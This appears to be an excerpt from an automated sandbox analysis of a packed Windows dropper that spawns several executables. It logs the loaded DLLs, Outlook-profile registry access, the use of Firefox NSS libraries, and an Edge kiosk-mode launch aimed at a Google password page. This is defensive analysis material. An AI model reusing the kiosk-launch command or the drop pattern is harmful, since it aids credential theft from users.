Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2064,i,2067255111273932546,8949113653420219710,262144 --disable-features=TranslateUI /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4612 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6416 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6416 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4132 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1160,i,17042684596641100279,13993029759771197311,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=2064,i,2036512315538271588,12735040485945945240,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1909248 > 1048576
Source: file.exe Static PE information: Raw size of gmovqjaa is bigger than: 0x100000 < 0x1a0a00
Source: Binary string: mozglue.pdbP source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: nss3.pdb@ source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr, vcruntime140[1].dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr, msvcp140[1].dll.7.dr
Source: Binary string: nss3.pdb source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: mozglue.pdb source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.7.dr, softokn3.dll.7.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 6.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
